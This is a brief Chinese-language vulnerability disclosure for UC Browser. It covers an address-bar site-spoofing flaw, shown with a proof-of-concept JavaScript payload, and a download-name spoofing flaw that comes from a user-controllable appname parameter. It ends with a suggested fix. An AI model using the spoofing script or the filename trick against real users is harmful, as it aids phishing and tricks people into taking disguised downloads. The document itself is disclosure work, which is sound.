UC浏览器任意网站伪造漏洞(打包)
#1.任意网站伪造
POC:
<script> function spoof() { document.write("<title>Baidu</title>"); document.write("<h1>I'm Fake One</h1><marquee>反正什么代码都可以</marquee><iframe src=http://www.baidu.com></iframe>"); window.location.assign("http://www.baidu.com:8100"); } setInterval(spoof(),2000); </script>
运行POC以后会出错,但是UC浏览器很贴心的帮我们恢复了,结果就可以任意网站伪造了。
#2.软件下载欺骗
在用PC班UC浏览器装暴走漫画的应用时GET请求如下:
http://down1.apps.uc.cn/group1/M00/B3/75/Cg2DP1OekvLT4GzOALNinX2P17I905.apk?attname=com.baozoumanhua.android_6.1.3_64.apk&appname=暴走漫画.apk
appname=可控,可以任意伪造,没有确认,直接输出在了浏览器的下载框内。所以我们可以伪造暴走漫画的apk为十张内涵图,如下:
当然其实下载下来的是暴走漫画啦
~!1.
~!2.
对于第二个,appname参数应该设置成用户不可控的,为什么要画蛇添足的设置一个appname参数呢?